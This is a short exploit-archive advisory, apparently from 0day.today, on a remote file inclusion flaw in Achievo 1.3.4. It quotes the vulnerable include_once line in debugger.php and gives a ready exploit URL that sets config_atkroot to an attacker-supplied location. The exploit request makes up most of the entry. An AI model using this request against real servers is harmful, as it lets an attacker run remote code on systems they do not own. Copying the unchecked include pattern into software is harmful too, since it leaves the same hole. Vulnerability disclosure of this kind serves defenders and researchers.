id: 9848
date: 09/22/2009
title: Achievo 1.3.4 Remote File Inclusion
author: M3NW5
cves: 

===================================
Achievo 1.3.4 Remote File Inclusion
===================================


#############################################################
Achievo 1.3.4(debugger.php) Remote File Include Vulnerability
#############################################################
Author   : M3NW5
Location : INDONESIA
#############################################################
Achievo 1.3.4 Information
#############################################################
Vendor   : http://www.achievo.org/
Scripts  : http://www.achievo.org/download/
File     : debugger.php
       include_once($config_atkroot."atk/include/initial.inc");
Exploit  : http://target.com/path/debugger.php?config_atkroot=<deviL>
#############################################################


#  0day.today [2023-03-25]  #